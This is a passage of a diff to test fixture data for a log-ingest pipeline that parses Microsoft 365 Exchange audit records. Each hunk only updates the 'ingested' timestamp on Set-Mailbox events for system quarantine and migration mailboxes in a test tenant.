(21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -2262,7 +2262,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853111300Z", + "ingested": "2021-12-14T14:49:28.056959554Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:14\",\"ExternalAccess\":true,\"Id\":\"4d2e1010-489d-4aa0-e300-08d7ac0f314c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -2345,7 +2345,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853117200Z", + "ingested": "2021-12-14T14:49:28.056960192Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -2426,7 +2426,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853122900Z", + "ingested": "2021-12-14T14:49:28.056960943Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -2507,7 +2507,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853127Z", + "ingested": "2021-12-14T14:49:28.056961475Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d3533d4d-f62f-4731-d0c9-08d7adfc0c7b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -2588,7 +2588,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853130300Z", + "ingested": "2021-12-14T14:49:28.056961920Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -2669,7 +2669,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853135200Z", + "ingested": "2021-12-14T14:49:28.056962560Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:08\",\"ExternalAccess\":true,\"Id\":\"bc03d223-966c-4e33-6cf7-08d7ac0f2d88\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -2750,7 +2750,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853140400Z", + "ingested": "2021-12-14T14:49:28.056963128Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -2831,7 +2831,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853145400Z", + "ingested": "2021-12-14T14:49:28.056963696Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7a500a7f-cc56-4dfd-d740-08d7ac0f2e45\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -2912,7 +2912,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853151200Z", + "ingested": "2021-12-14T14:49:28.056964433Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:10\",\"ExternalAccess\":true,\"Id\":\"6047e3da-8661-44a4-6fd2-08d7ac0f2e85\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -2993,7 +2993,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853155300Z", + "ingested": "2021-12-14T14:49:28.056965019Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -3074,7 +3074,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853159300Z", + "ingested": "2021-12-14T14:49:28.056965529Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -3152,7 +3152,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853162700Z", + "ingested": "2021-12-14T14:49:28.056966070Z", "original": 